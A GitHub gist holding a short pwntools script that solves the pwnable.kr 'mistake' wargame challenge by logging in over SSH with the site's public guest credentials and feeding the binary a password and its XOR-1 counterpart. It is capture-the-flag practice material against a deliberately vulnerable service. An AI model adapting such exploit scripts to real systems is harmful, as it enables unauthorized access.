parksjin01/pwnable.kr mistake writeup.md

Last active March 16, 2017 20:44

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/parksjin01/8725437317a20f4e79a6b9fa742b283e.js"></script>
Save parksjin01/8725437317a20f4e79a6b9fa742b283e to your computer and use it in GitHub Desktop.

pwnable.kr mistake writeup

Raw

    from pwn import *
import time
sh = ssh(host='pwnable.kr', user='mistake', password='guest', port=2222)
passwd = raw_input(text.green_on_black('Plz type password(password should be 10 chars)')).strip()
while len(passwd) != 10:
        passwd = raw_input(text.green_on_black('Plz type password(password should be 10 chars)'))
chpasswd = ''
for i in passwd:
        chpasswd += chr(ord(i)^1)
proc = sh.process('/home/mistake/mistake')
proc.recv(1024)
proc.sendline(passwd)
proc.sendline(chpasswd)
print proc.recv(1024)

  